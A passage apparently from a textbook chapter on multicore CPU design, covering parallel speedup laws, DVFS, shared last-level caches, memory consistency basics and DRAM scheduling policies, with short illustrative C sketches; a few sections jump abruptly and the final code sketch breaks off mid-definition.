Second, Amdahl’s Law assumes that the problem size is fixed regardless of the
number of parallel threads. In reality, the number of threads used to parallelize a
program is typically linked with the number of available CPUs. For a multiprocess-
ing machine, when there are more CPUs, a program has more resources available
to it, such as memory capacity.
Fig. 4 Comparison of theoretical parallel speedup estimated by Amdahl’s Law and Gustafson’s
Law, for different parallelizable fractions f. Inset graphs show a zoomed-in section of the main
graph for clarity. (a) Amdahl’s Law. (b) Gustafson’s Law
As a result, programmers and/or users can increase
the problem size to take advantage of these extra resources. Since Amdahl’s Law
does not capture the impact of these extra resources, it can provide a pessimistic
estimate of the capabilities of a multi-CPU machine. Gustafson’s Law (Gustafson
1988) accounts for this, by calculating the parallel speedup S as
S = (1 − f) + f × n    (2)
Figure 4b shows the predicted speedups from the law, to provide a comparison to
Amdahl’s Law.
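Both laws are straightforward to evaluate numerically, as in the short C sketch below. For example, with f = 0.9 and n = 256, Amdahl’s Law bounds the speedup near 9.7×, while Gustafson’s Law predicts roughly 230×.

/* Evaluate Amdahl's Law (Eq. 1) and Gustafson's Law (Eq. 2) side by side
 * for a range of thread counts, mirroring Fig. 4. */
#include <stdio.h>

static double amdahl(double f, double n)    { return 1.0 / ((1.0 - f) + f / n); }
static double gustafson(double f, double n) { return (1.0 - f) + f * n; }

int main(void) {
    const double f = 0.9;  /* parallelizable fraction */
    for (int n = 1; n <= 256; n *= 2)
        printf("n = %3d  Amdahl: %7.2f  Gustafson: %7.2f\n",
               n, amdahl(f, n), gustafson(f, n));
    return 0;
}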
Real-world parallel system performance deviates from both Amdahl’s Law
and Gustafson’s Law. For example, while one could treat Gustafson’s Law as an
optimistic upper bound on performance, real machines can sometimes outperform
the estimated parallel speedup from Gustafson’s Law due to data sharing. If one
thread brings data into a shared memory that is subsequently used by a second thread
(exploiting temporal and/or spatial locality across threads), the second thread no
longer pays the memory latency required for that subsequent data access (assuming
that the data is not evicted). This phenomenon is an example of superlinear speedup.
Putting this all together, Fig. 5 shows a synthetically constructed example of the
parallel speedup one could expect to observe on a real parallel system. The example
assumes that 99% of the application can be parallelized across all threads, while the
remaining 1% must execute sequentially. It also assumes that the machine has 32
CPU cores, and since it has a fixed set of available resources, Amdahl’s Law can be
used to predict performance. There are three observations from the figure. First, even
with a single thread, the observed speedup is less than 1. This is because parallel
speedup is compared against the best sequential implementation (see “Evaluating
Multicore CPUs”), and a parallel implementation (with a configurable parameter n
that sets the thread count) typically has overheads associated with adding code to
support parallel execution, and these overheads are observed when n = 1. Second,
superlinear speedups can even exceed perfect parallelism. As mentioned above,
this is the result of threads helping each other through data locality. Third, after
a certain thread count (24 in our example), the performance at a higher thread count
is actually lower than the performance at a lower thread count. This is because
the benefits of additional thread-level parallelism and additional data locality are
overcome by synchronization and interference overheads.
Fig. 5 Parallel speedup of a synthetic example as a function of thread count: the dashed line
shows the expected performance (f = 0.99 with Amdahl’s Law), and the solid line shows the
observed performance
Note that while Fig. 5 is one example of parallel application behavior, its trends
are not universal. As one example, some applications exhibit what is known
as embarrassingly parallel behavior (Mattson et al. 2004), where an application
continues to achieve near-ideal parallel speedup even at high thread counts, due to
limited need for synchronization and serialization.
What to Do With All These Transistors?
Through the 1990s (and drawing some very broad, and likely inaccurate, gen-
eralizations), the vast majority of parallel computing architectures catered to the
large-scale computing market, with much of the effort focused on supercomputers.
Most personal computers (PCs) and workstations incorporated only a single-core
CPU (or in the case of some high-end workstations, multiple single-core CPUs
installed on a multi-socket motherboard). (At that time, there was a distinction
between more mainstream PCs and high-performance workstations that targeted
power users. Today, in large part due to advancements in PC capabilities throughout
the 1990s, this distinction has mostly disappeared, but the chapter references it
here for historical context.) Much of the focus on architectural innovation remained
on improving the performance of the single core, leading to the maturation and
widespread commercial adoption of techniques such as out-of-order processing and
superscalar execution.
Concurrently, several architects started envisioning a new direction of CPU
design. In the early 1990s, with no immediate end in sight to Moore’s Law and
Dennard Scaling, a number of works speculated that with millions of additional
transistors becoming available on a chip within the next decade, it would now
be feasible to replicate multiple CPU cores within a single chip. This concept
came to be known as a single-chip multiprocessor (which ultimately led to the
multicore CPU).
Multicore CPU Hardware Design
While the term multicore CPU may lead one to think that there are significant
additions at a microarchitectural level to enable parallel execution, the central design
of the cores is often (but not always) simpler than the most aggressive single-
core CPU microarchitectures released by manufacturers. In fact, the majority of
the critical hardware changes to enable multicore CPUs lie outside of the CPU core.
A central tenet of multicore CPU design is that performance can be attained through
parallelism and repetition, as opposed to design complexity.
Figure 6 shows a typical example of the major components found in a multicore
CPU. Two or more CPU cores sit within the same chip package, with each core
having its own (i.e., private) L1 instruction, L1 data, and unified L2 caches. All of
the cores have shared access to a single last-level cache (LLC). The LLC connects
with one or more on-chip memory controllers, which provide access to off-chip
DRAM modules in the system.
Multicore CPU designers prevent the design and verification effort of the CPU from
increasing linearly with the core count by relying on design reuse through tiling. In a
homogeneous multicore CPU, the design of the cores is identical, in order to reduce
manufacturing and verification/testing costs. (The section titled “The Evolution of
Multicore CPUs” discusses popular approaches for heterogeneous multicore CPU
design.) Figure 6 shows how the majority of the chip for a typical homogeneous
multicore CPU is made up of multiple tiles, where each tile has exactly the same
components.
Fig. 6 Major components of a typical multicore CPU: tiles containing a core with its per-core,
private L1I, L1D, and L2 SRAM caches; a shared last-level (L3) cache; and memory controllers
connecting to off-chip DRAM
A tile usually consists of a single CPU core and the private caches
associated with that core. Some architectures include a slice of the last-level cache
in the tile (see the section titled “Sharing Caches and Main Memory”). In addition
to these tiles, the chip includes shared components (e.g., controllers that connect the
CPU cores to external components, interconnects).
To enable multiple tiles to be stamped out without incurring an exorbitant
increase in chip area compared to a powerful single-core CPU, the CPU core within
the tile is significantly simplified. As an example, the Core 2 Duo, the second line
of desktop multicore CPUs by Intel (and the first whose microarchitecture was
designed with dual-core processing in mind), was not based on the then-state-of-
the-art NetBurst microarchitecture (Boggs et al. 2004) that formed the basis of the
Pentium 4. Instead, it utilized a new microarchitecture known as Core, which was
based on the mobile-oriented Pentium M variant of the P6 microarchitecture (Hinton
2010), with roots spanning back to the mid-1990s.
When the CPU is unable to achieve peak throughput, significant energy is wasted
by running the CPU at its full voltage and frequency. The dynamic power Pdyn
consumed by a CPU to execute a program can be modeled as a function of its supply
voltage (V) and frequency (f):
Pdyn ∝ α × C × V² × f    (3)
where α is an activity factor, and C is the switched load capacitance of the CPU’s
transistors. Over time, if the CPU continues at full dynamic power during periods
of underutilization, a large amount of energy is wasted. DVFS techniques can detect
when the CPU is stalling or being underutilized and reduce the supply voltage and/or
the clock frequency of the CPU.
One limitation of DVFS is Vmin , the minimum operating voltage of the CPU core.
A lower bound on Vmin is the threshold voltage of a transistor, which is the minimum
voltage at which the transistor effectively operates as a digital switch. The threshold
voltage is a function of the manufacturing process technology. Practically, though,
Vmin is notably higher than the threshold voltage, in order to ensure the reliable
operation of the CPU. Between the nominal operating voltage (Vdd ) and Vmin , DVFS
lowers the voltage of the selected CPU core. As the voltage is linearly correlated
with the CPU core frequency, this results in a cubic reduction in dynamic power,
based on Eq. 3. Once DVFS reaches Vmin , it can continue to lower the frequency
but must leave the voltage at Vmin , resulting in a linear reduction in dynamic power.
Figure 7 shows this relationship for a hypothetical CPU, with a base frequency of
4.0 GHz at a TDP of 88 W, Vdd = 1.2 V, Vmin = 1.0 V, and a turbo boost frequency
of 4.4 GHz.
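To make this cubic-then-linear relationship concrete, the following minimal sketch (in C) models relative dynamic power as frequency is lowered, assuming, as in the Fig. 7 example, that voltage scales linearly with frequency down to Vmin and is clamped there afterward; the activity factor and capacitance from Eq. 3 are folded into an arbitrary scale factor, so only the trend is meaningful.

```c
#include <stdio.h>

/* Parameters taken from the hypothetical Fig. 7 CPU. */
#define VDD    1.2    /* nominal operating voltage (V)     */
#define VMIN   1.0    /* minimum operating voltage (V)     */
#define F_BASE 4.0e9  /* frequency at nominal voltage (Hz) */

/* Voltage tracks frequency linearly between Vmin and Vdd, but cannot
 * drop below Vmin (the DVFS floor discussed above). */
static double voltage_at(double freq_hz)
{
    double v = VDD * (freq_hz / F_BASE);
    return (v < VMIN) ? VMIN : v;
}

/* Relative dynamic power from Eq. 3: P_dyn is proportional to
 * alpha * C * V^2 * f; alpha * C is dropped since only the trend
 * matters for this sketch. */
static double relative_pdyn(double freq_hz)
{
    double v = voltage_at(freq_hz);
    return v * v * freq_hz;
}

int main(void)
{
    double p_full = relative_pdyn(F_BASE);
    for (double f = 4.0e9; f >= 0.5e9; f -= 0.5e9)
        printf("%.1f GHz -> %.1f%% of full dynamic power\n",
               f / 1e9, 100.0 * relative_pdyn(f) / p_full);
    return 0;
}
```

Running the sketch shows power falling with the cube of frequency until roughly 3.3 GHz (where the modeled voltage reaches Vmin) and only linearly below that point.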
Given that each core in a multicore system has the ability to execute a different
thread or workload from the other cores, it is inefficient to manage DVFS settings
at a global level. However, early approaches to DVFS relied on large off-chip
switching voltage regulators, which each consumed significant area and power and
which had response times on the order of tens of microseconds. Within a few years
of the introduction of DVFS in commercial systems, on-chip voltage regulators were
developed. These on-chip regulators, often called buck converters (Kim et al. 2008),
are capable of performing sub-100 ns voltage switching, at >90% efficiency. Due
to their low cost and fast response, buck converter-based DVFS is now widely used
in multicore CPUs, where each CPU core has its own on-chip regulator to allow
for per-core DVFS throttling. The voltage and frequency settings for each core
are typically selected in the operating system, using a governor (see the section
titled “Optimizing Operating Systems for Multicore CPUs”).
Fig. 7 Dynamic power reduction for the hypothetical CPU as DVFS lowers its frequency. The solid line shows the actual DVFS behavior, while the dotted line shows idealized further reductions to dynamic power if Vmin was not a lower limit to voltage scaling (x-axis: CPU frequency in GHz)
core CPUs. For example, in the single-core model, the cache hierarchy should
ideally provide enough cache capacity to handle common workloads that exhibit
large cacheable data footprints (e.g., workloads with memory access patterns that
exploit spatial and/or temporal locality across multiple megabytes of data).
In a multicore CPU, the ability to share (i.e., pool together) resources across
multiple cores can allow us to support near-worst-case behavior for a subset of
cores (e.g., if one core runs a worst-case workload) while keeping total resource
allocation at a more modest level. Returning to the cache capacity example, while
a multicore CPU catering to the worst case (e.g., a situation where each core runs
a large-footprint workload) could potentially require several megabytes of cache
capacity per core, multicore designers reduce the per-core amount of cache
in the CPU and instead allow cores to share much of their cache capacity with each
other. The two most prominent examples of resource sharing in a multicore CPU
are in the memory hierarchy: the last-level cache (LLC) and main memory.
One issue with sharing resources across CPU cores is interference (Bitirgen et al.
2008), where due to the finite amount of available resources, multiple cores may
contend with each other for their desired share of these resources. Let us look at a
contrived example, with a two-core CPU, where one core is servicing a cache miss
that must retrieve data from main memory. As the data for that miss arrives at the
LLC, the LLC must evict an existing cache block (assuming that no invalid blocks
remain). Interference can occur when the eviction is for a cache block belonging to
the other core, as that core will now miss on a subsequent access to the evicted block.
Had the first core not triggered the eviction, this subsequent access would have been
a cache hit, avoiding the long-latency miss to main memory. The resource contention
that results from multicore interference can hurt the effective performance and
energy consumption of the CPU (the section titled “Evaluating Multicore CPUs”
discusses metrics to quantify this impact). As a result, several approaches have been
proposed to mitigate interference in the memory hierarchy (see section “Mitigating
Interference”).
In order to accommodate the needs of all of the cores in the multicore CPU, the
LLC tries to reduce the potential for set contention and the associated invalidations.
First, the LLC is significantly larger (e.g., on the order of multiple megabytes,
reaching tens of megabytes for large contemporary multicore CPUs) than the typical
LLC capacities from the single-core era (e.g., the L2 caches of that era, which were
then the LLC of the CPU, were only hundreds of kilobytes in size). Second, the LLC has
notably higher associativity, with modern CPUs implementing 24-way and 32-way
set-associative caches. While this significantly increases the area of the LLC, with
some multicore CPUs using as much as half of their total die area for the LLC,
the increases are amortized across all of the cores (as compared to increases in the
private cache area).
To work around capacity and port limitations, modern caches rely on the concept
of cache slicing, where a cache level is decomposed into multiple smaller pieces.
(Cache slicing has been referred to by several terms over the years, including cache
interleaving and cache multibanking. Early works on cache interleaving date to
the early 1980s (Smith 1982), and initial implementations interleaved (i.e., distributed) the
words within a single cache block across multiple cache banks. This chapter uses
the term cache slicing to refer to cache block interleaving across cache slices/banks,
where a single slice/bank contains the entire cache block (Sohi and Franklin 1991).)
Each cache slice contains a subset of the total number of cache sets in the level
and is further partitioned by the number of ways. The slicing requires each cache
access to first go through a slice decoder to identify which slice to look up. While
early slice decoder implementations used a subset of the cache block address bits
(e.g., using two of the cache index bits to decide which of four slices the block
is assigned to), several commercial CPUs employ complex hash-based set mapping
functions (e.g., Lempel 2011) to avoid hotspots (i.e., the uneven distribution of cache
accesses across slices).
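As a rough illustration of the two decoder styles described above, the sketch below (in C) derives a slice number either from the low-order index bits or from a simple XOR-folding hash. The slice count, offset width, and hash function are illustrative assumptions; in particular, the hash shown here is not the hash used by any specific commercial CPU.

```c
#include <stdint.h>

#define NUM_SLICES        4  /* assumed power-of-two slice count */
#define BLOCK_OFFSET_BITS 6  /* assumed 64-byte cache blocks     */

/* Simple slice decoder: use the index bits just above the block
 * offset to pick a slice, as in early implementations. */
static unsigned slice_simple(uint64_t paddr)
{
    return (paddr >> BLOCK_OFFSET_BITS) & (NUM_SLICES - 1);
}

/* Hash-based decoder (illustrative only): XOR-fold higher address
 * bits into the slice selection so that strided access patterns
 * spread more evenly across slices, avoiding hotspots. */
static unsigned slice_hashed(uint64_t paddr)
{
    uint64_t x = paddr >> BLOCK_OFFSET_BITS;
    x ^= x >> 7;   /* fold in higher-order bits */
    x ^= x >> 13;
    return (unsigned)(x & (NUM_SLICES - 1));
}
```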
Inside a slice, to further manage scalability, the slice is typically partitioned into
a tag store (i.e., a tag directory, which stores metadata about each cache block in the
slice) and a data store (i.e., the actual data inside each cache block). While tag–data
partitioning is an independent concept from cache slicing, it also helps to reduce
cache energy by not activating the data bitlines unless a cache hit occurs (albeit at
the expense of increased latency due to serializing the tag and data lookups). Note
that for very large caches, the data store of a cache slice can be further partitioned
into multiple two-dimensional subarrays of SRAM (Huang et al. 2013), to further
reduce power consumption.
There are two general approaches to laying out the shared LLC on a multicore
CPU chip, both of which support cache slicing. As mentioned in the section
titled “Optimizing CPU Cores for Parallelism,” a multicore CPU is made up of
multiple tiles, where a tile includes a CPU core and its private caches. The first
approach for LLC layout allocates a fixed amount of cache outside of these tiles,
as shown in Fig. 8a, using a separate tile for the LLC. Often with this layout, the
controller for the LLC is centralized, and each core has access to the cache controller
via a bus (i.e., a shared wire across all cores), though some implementations
maintain an independent controller for each cache slice, in which case a crossbar is
used. The second approach for LLC layout includes a slice of the LLC with each
CPU core tile, as shown in Fig. 8b (leading to a one-to-one correspondence between
core count and cache slice count). With this layout, each cache slice typically
maintains an independent controller, and the controllers are connected together
using a ring interconnect (Lempel 2011; Huang et al. 2013).
A key challenge with large LLCs is access time. Conventionally, monolithic
caches provide uniform cache access, where all cores can access any block in the
cache with the same latency (assuming no interference). As LLCs have become
larger and sliced, cores often deal with non-uniform cache access (NUCA) (Kim
et al. 2002), where it can take a longer time for a core to access a remote slice (i.e.,
the additional time required to traverse the interconnect) than it does to access its
local slice. A NUCA cache can incur higher latencies than a cache with uniform
Fig. 8 Two approaches to tiling a multicore CPU layout. Note that tiles on the bottom row are
intentionally shown upside down to represent the stamping of identical tiles. (a) Tile without a
piece of the LLC. (b) Tile containing an LLC slice
cache accesses, but the slicing enables additional bandwidth by allowing concurrent
accesses to each slice, mitigating some of the performance loss.
For a given mix of workloads, a multicore CPU with n cores can potentially
issue cache misses to main memory at as much as n times the rate that a single-
core CPU does (note that this assumes similar core architectures in both CPUs and
depends heavily on the specific workloads and on the impact of cache interference
between cores). This requires the main memory to scale up its ability to respond
to these cache misses, and modern memory subsystems scale up in two notable ways.
First, more MSHRs are provided at the LLC in order to sustain a greater number
of concurrent memory accesses. An LLC miss must stall any time the cache does
not have a free MSHR available to allocate. If there are not enough MSHRs in
the system, then such stalls are more likely to occur. As each cache slice often
has its own set of MSHRs, multicore CPUs take advantage of the increased slice
count to provide more MSHRs at a low cost, compared to scaling up a monolithic
CAM. Second, the memory bandwidth has been scaling up to accommodate the
increased demand. The memory bandwidth provided by DRAM has been increasing
significantly over the last two decades, through a combination of (1) increasing bus
frequencies for the memory channel and (2) the emergence of new DRAM types
such as DDR5 (JEDEC Solid State Technology Assn. 2024) and High-Bandwidth
Memory (HBM) (JEDEC Solid State Technology Assn. 2020). While memory
bandwidth can also be scaled by increasing the number of memory channels per
CPU, multicore CPUs have largely avoided this approach due to the limited number
of pins available in the CPU chip package.
The sharing of a single main memory across multiple cores changes the
behavior of three key policies, compared to their behavior with single-
core CPUs. First, the optimal choice of an address interleaving scheme (i.e., which
bits index which memory structures) can change depending on the type of workload
executing on the CPU. Second, the optimal choice of row policy (i.e., whether a
DRAM row is left open after all currently queued requests are serviced) can depend
on the type of workload as well. Third, the memory scheduling algorithm (i.e., the
order in which queued DRAM requests are serviced) may need to change to avoid
starving requests in certain scenarios. The section titled “Main Memory Policies”
discusses each of these in detail.
One key artifact of the memory hierarchy of a multicore CPU is that cores do
not always write updates to globally visible locations. For example, in a typical
multilevel hierarchy that employs write-back caches, a core will write data to its
private L1 data cache, but this updated value will not be immediately visible to
other cores in the CPU, as they cannot directly access another core’s private cache.
This is at odds with the architectural model (i.e., abstraction) that is presented to
programmers, where the cores have access to a global shared memory (which is not
the same as main memory; see “Shared-Memory Model” for more details). As part
of this shared-memory model, a data update written by a core to shared memory
will become visible to other cores. In contrast, caches are a microarchitectural
optimization that is not, in principle, exposed to programmers as part of the
architectural abstraction. (This is in part because (1) caches are designed to be
hardware-managed structures that operate transparently to the programmer and
(2) cache configurations can differ between different CPU models belonging to
the same instruction set architecture. In practice, programmers use knowledge of
the design of the cache hierarchy to optimize program performance, while still
expecting the behavior of the system to adhere to the semantics of the shared-
memory programming model.) As such, any interaction that a core has with a cache
must appear to the program as if it is taking place globally in shared memory, as
this is what a programmer expects.
In order to maintain program correctness, a multicore CPU must ensure that data
updates are coordinated across all of the cores (as is the case in any parallel
computer architecture). For the shared-memory programming model typically used
for multicore CPUs, this involves two types of coordination (Nagarajan et al. 2020):
(1) cache coherence, which ensures that updates to a single unit of data (e.g., one
cache block) are made visible to and ordered across all cores, and (2) memory
consistency, which ensures that updates across multiple units of data are interleaved
according to a predetermined policy across all cores. The sections titled “Cache
Coherence” and “Memory Consistency Models” discuss cache coherence and
memory consistency, respectively, in more detail.
While the term multicore does not in theory place any limits on the number of
cores in a CPU, there is a distinction made between multicore CPUs with smaller
core counts (e.g., under 24 cores in contemporary systems) and manycore CPUs,
which are multicore CPUs that consist of several dozens of cores. This distinction is
made because of key scalability challenges that become prominent as the core count
increases significantly. For the smaller core counts, the interconnects described
in the section titled “Sharing Caches and Main Memory” can enable reasonable
parallel performance. However, at the manycore level, the significant increase in
contention makes both bus-based and ring-based interconnects infeasible. As a
result, specialized research and development has focused on how to provide more
scalable communication at high core counts.
The initial ideas that would evolve into manycore CPU design stem from the
Raw microprocessor project at MIT (Waingold et al. 1997). Conceived around the
same time as the Hydra CMP (see “What to Do With All These Transistors?”), the
Raw CPU took a more extreme approach to CPU core simplification, arguing that
sophisticated compilers could obviate the need for complex ILP mechanisms. As a
result, the Raw CPU consisted of multiple small tiles, where each tile included a
very simple CPU core along with a small piece of cache. The tiles were meant to be
composable: Depending on the needs of a platform and on the available transistor
count, a manufacturer could stamp out more or fewer tiles depending on their
needs. By making each tile small, the distance between tiles (and, thus, the distance
between cores) and intra-tile wire lengths would both be short, allowing for the CPU
to run at a faster clock frequency without excessive power consumption. To enable
composability with varying tile counts, the tiles connected to each other using a
packetized mesh network (a two-dimensional interconnect), including configurable
on-chip routers. The first Raw CPU, prototyped in 2002, included 16 tiles on a single
chip.
Unfortunately, there is no precise core-count threshold or set of specific
properties that a manycore CPU must have, and the perceived distinction between
manycore CPUs and more conventional multicore CPUs has shifted as capabilities
have evolved over the last two decades. Aside from mesh-based tile organizations,
other properties observed in several manycore CPUs include non-uniform cache
access (NUCA) architectures with multiple cache slices and the replacement of
hardware cache coherence with software-driven message passing interfaces. While
not a comprehensive list, examples of commercial CPUs that have been considered
to be manycore include the Tilera TILE 64 (a commercialization of the MIT Raw
CPU), the Intel Xeon Phi series, and various CPUs from PEZY, including their 2048-
core PEZY-SC2 released in 2017.
Managing Memory
The cores in a multicore CPU share memory with each other, as discussed in
the section titled “Sharing Caches and Main Memory.” This sharing introduces a
number of issues that must be considered by both programmers and architects. This
section will discuss several of these issues. To start, it defines what it means to share
memory, both from a software perspective and from a hardware perspective. Then,
Fig. 9 Cores with private L1I, L1D, and L2 caches sharing a memory channel to DRAM banks, where each bank has its own row buffer
Shared-Memory Model
From the first symmetric multiprocessor computer, the Burroughs D825 (Anderson
et al. 1962), the majority of multiprocessor systems have enabled CPU cores to share
the physical main memory with each other. Through the decades, to mitigate the
long latencies of memory, several microarchitectural enhancements (e.g., caches,
memory speculation) have extended the memory subsystem hardware but have done
so transparently to the programmer. From the programmer’s perspective, multicore
CPUs predominantly make use of a shared-memory model, which at a high level
resembles the memory model of early computers. In the shared-memory model, each core has access
to a single shared physical memory (which may be implemented in a centralized or
a distributed manner). When any core performs a store to an address in this single
shared memory, the update becomes visible to all cores that subsequently load from
that address. While in principle the shared-memory model sounds simple, it has
two key implications on the design of multiprocessor systems (and, by extension,
multicore CPUs).
First, for a core, one needs to define when a store is considered to be performed
(i.e., the moment at which the stored value becomes visible to other cores). For
example, for an out-of-order core, a popular definition is that a store is performed
once the store instruction is committed. Prior to commit, there are several events that
can cause an executed store to be squashed (e.g., exception, misspeculation), making
the commit event the earliest time that the store is guaranteed to safely proceed. As
a result, stores are buffered inside the core, and the store operation to the first-level
cache is not initiated until after the store instruction commits. A physical store buffer
(sometimes called a write buffer) contains all committed writes that are yet to be
issued to the cache. Depending on the memory consistency model, this store buffer
may or may not be considered a part of shared memory; if it is, the store values in
the buffer must be made available to other cores in a way that does not violate the
consistency model (see “Memory Consistency Models” for more).
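As a rough sketch of this mechanism, the following C code models a store buffer as a fixed-depth FIFO: entries are inserted when stores commit and drained in program order to the L1 data cache. The depth, entry layout, and write_to_l1() callback are illustrative assumptions; real designs add features such as write coalescing and store-to-load forwarding.

```c
#include <stdbool.h>
#include <stdint.h>

#define SB_ENTRIES 8  /* illustrative store buffer depth */

/* One committed-but-not-yet-written store. */
struct sb_entry {
    uint64_t addr;
    uint64_t data;
    bool     valid;
};

/* A circular FIFO: stores enter at commit (tail) and drain to the
 * L1 data cache in program order (head) when a cache port is free. */
struct store_buffer {
    struct sb_entry e[SB_ENTRIES];
    unsigned head, tail;
};

/* Called when a store instruction commits; returns false if the
 * buffer is full (the core must stall commit until an entry drains). */
static bool sb_insert(struct store_buffer *sb, uint64_t addr, uint64_t data)
{
    unsigned next = (sb->tail + 1) % SB_ENTRIES;
    if (next == sb->head)
        return false;  /* buffer full */
    sb->e[sb->tail] = (struct sb_entry){ addr, data, true };
    sb->tail = next;
    return true;
}

/* Called when the L1 data cache can accept a write: the oldest store
 * is the one that becomes visible to the memory system first. */
static bool sb_drain_one(struct store_buffer *sb,
                         void (*write_to_l1)(uint64_t addr, uint64_t data))
{
    if (sb->head == sb->tail)
        return false;  /* buffer empty */
    write_to_l1(sb->e[sb->head].addr, sb->e[sb->head].data);
    sb->e[sb->head].valid = false;
    sb->head = (sb->head + 1) % SB_ENTRIES;
    return true;
}
```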
Second, the CPU must ensure that microarchitectural optimizations for memory
operations obey a consistent set of rules, which are part of the instruction set
architecture (ISA), so that programmers do not encounter program correctness
issues during execution. All private and shared caches are considered part of the
shared memory, which means that cache coherence is needed to propagate the value
of a cache store to other caches and cores, as the section titled “Cache Coherence”
discusses. Both within a thread and across threads, the interleaving of a store
with other stores and with loads must obey a set of rules that are promised to
the programmer, which are defined as part of the memory consistency model. As
“Memory Consistency Models” discusses, some memory consistency models have
strict interleaving expectations, which can simplify programming complexity at the
expense of high performance overheads, while more relaxed memory consistency
models can allow different cores to observe different interleavings (following a
defined set of guarantees) in order to improve performance.
Main Memory Policies
As discussed in "Sharing Caches and Main Memory," there are three types of
policies for main memory management that are impacted by the introduction of
multiple cores: address interleaving, row policy, and memory scheduling. Each of
these policies is implemented inside the memory controller. Unlike the single-core
case, where the choice of policy for each type can be determined by analyzing
program behavior, the nondeterminism that exists for shared-memory interactions
in a multicore CPU makes it difficult to easily choose a single optimal policy.
Figure 10 illustrates two common interleaving schemes that optimize locality and
MLP over a basic approach without interleaving. In the first scheme, cache block
interleaving, consecutive cache blocks in the memory address space are distributed
to different banks (and in some cases to different memory channels) to allow
requests to the two blocks to be serviced concurrently. In the second scheme, row
interleaving, consecutive cache blocks stay in the same row to maximize hits to the
already-open row, but consecutive rows are distributed to different banks/channels.
While cache block interleaving is a popular scheme for single-core CPUs, it
can introduce issues in a multicore CPU. For example, with a multiprogrammed
workload (i.e., when multiple cores are executing threads that belong to different
processes), one thread may tie up many channels at the same time by accessing
several consecutive cache blocks. This would increase the chance of interference
for any of the other threads trying to access data in memory, by increasing the
likelihood that the channel will be busy. Worse yet, if two different processes
access several consecutive cache blocks, this can generate a large number of bank
conflicts (i.e., row conflicts) in DRAM that could have been avoided with a row
interleaving scheme. A non-interleaved memory (i.e., where consecutive rows map
to the same bank) can reduce the probability of bank conflicts due to interference,
but at the expense of sacrificing memory-level parallelism for memory-intensive
applications.
Fig. 10 Example of how address interleaving schemes impact the placement of cache blocks in
main memory, for a series of cache blocks that are consecutive in the physical address space. A
specific interleaving scheme is chosen by determining which bits of the physical memory address
are used to index the different levels of the memory hierarchy (in this example, the channel, the
bank, the row, and the column)
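The choice between the two schemes in Fig. 10 comes down to which physical address bits select the bank and channel. The sketch below (in C) shows one plausible bit assignment for each scheme; the geometry constants (64 B blocks, 32 blocks per row, 8 banks, 2 channels) are assumptions for illustration, not the mapping of any specific memory controller.

```c
#include <stdint.h>

/* Assumed geometry: 64 B blocks, 32 blocks per row, 8 banks, 2 channels. */
#define BLK_BITS  6  /* bits of block offset            */
#define BLKS_ROW  5  /* 32 blocks per row -> 5 bits     */
#define BANK_BITS 3  /* 8 banks                         */
#define CHAN_BITS 1  /* 2 channels                      */

/* Cache block interleaving: the bits just above the block offset pick
 * the channel and bank, so consecutive blocks land in different
 * banks/channels and can be serviced concurrently. */
static unsigned bank_block_interleaved(uint64_t paddr)
{
    return (paddr >> (BLK_BITS + CHAN_BITS)) & ((1u << BANK_BITS) - 1);
}

/* Row interleaving: the bank bits sit above the row's column bits, so
 * all blocks of a row share one bank (maximizing row buffer hits),
 * while consecutive rows alternate across banks/channels. */
static unsigned bank_row_interleaved(uint64_t paddr)
{
    return (paddr >> (BLK_BITS + BLKS_ROW + CHAN_BITS))
           & ((1u << BANK_BITS) - 1);
}
```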
Row Policy The row policy (Balasubramonian 2019) determines whether a row
in a bank should remain open once the memory controller services all currently
queued requests for that bank. In an open-row policy, the row stays open in case
future memory requests also access the same row (due to spatial locality), avoiding
the latency of reopening (i.e., reactivating) the row when the next request to the
bank arrives. In a closed-row policy, the row is closed as soon as the currently
queued requests for that bank are completed, under the assumption that new
requests are likely to access a different row, thus avoiding the row closing (i.e.,
precharging) latency when the next request to the bank arrives. Variations of these
policies exist, such as timeout policies that close the row a given number of cycles
after the last queued request is serviced. In a multicore CPU, the optimal policy
choice can depend on the workload executing on the CPU. For example, with a
multiprogrammed workload, the likelihood of the next access to the bank being
to the same row decreases compared to a single-core CPU, due to interference
and competition across different processes. However, with a multithreaded
workload, the likelihood can potentially increase instead, as multiple threads
belonging to the same process may each access data in the same row, depending
on how data accesses are partitioned across threads.
practically limits a bank to servicing at most one request at a time). This results
in significant complexity for scheduling memory requests, as the controller must
consider many factors such as the time a request has been waiting for, whether
the target bank for each queued request is idle or is in the middle of servicing
another request, and whether the target bank has the target row currently open (i.e.,
activated). Furthermore, while a memory controller can take advantage of bank-level
parallelism (BLP) to service requests to different banks concurrently, the physical
bus wires of the memory channel are shared across all banks belonging to the
channel, as shown in Fig. 9. As a result, the scheduler must also stagger requests
in a way that ensures exclusive access to the memory channel bus for only one
bank, when the bank needs to send data to or receive data from the controller.
Figure 11 shows how this staggering of memory requests can be coordinated for two
examples: (1) when multiple requests target different rows in the same bank (i.e.,
a bank conflict) and must serialize the opening of each row and (2) when multiple
requests target different rows in different banks, which can exploit BLP to overlap
multiple row openings and must serialize only the actual data transfer on the shared
memory channel’s data bus.
Fig. 11 Scheduling of multiple read requests when a bank conflict occurs (top) and when there
is bank-level parallelism that avoids a bank conflict (bottom). The notation Bb Rr Cc indicates a
memory access to Bank b, Row r, and Column c. This example assumes that all requests access
the same memory channel. The memory controller for the channel sends a request to the memory
via the address bus just before it is safe to initiate the operation inside memory (e.g., opening a
row). The controller must ensure that operations to the same bank do not overlap and data transfers
from memory to the controller on the shared data bus do not overlap
Technology Assn. 2024) and HBM (JEDEC Solid State Technology Assn. 2020)).
A commonly implemented algorithm is known as first-ready, first-come first-serve
(FR-FCFS) (Rixner et al. 2000), which prioritizes requests to already-activated rows
over older requests. FR-FCFS does this to improve average memory access time
(AMAT), as the time required to activate a row, and to precharge (i.e., close) the
row after requests are finished, can both take as long as the read and write requests
themselves (JEDEC Solid State Technology Assn. 2024). Memory controllers in
commercial multicore CPUs continue to use FR-FCFS without introducing any
notion of thread or application awareness (Balasubramonian 2019), which can
exacerbate interference across threads (see “Mitigating Interference”).
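The priority rule of FR-FCFS can be captured in a few lines: prefer row hits over row misses, and break ties by age. The sketch below (in C) assumes a simple per-bank record of the currently activated row; a real controller would also enforce DRAM timing constraints and read/write turnaround, which are omitted here.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define NUM_BANKS 8

/* Row currently activated in each bank's row buffer (-1 = no open row).
 * A real controller updates this as it issues activate and precharge
 * commands; here it is simply state for the sketch. */
static int open_row[NUM_BANKS] = { -1, -1, -1, -1, -1, -1, -1, -1 };

struct mem_request {
    uint64_t arrival_time;  /* used for the first-come, first-serve tiebreak */
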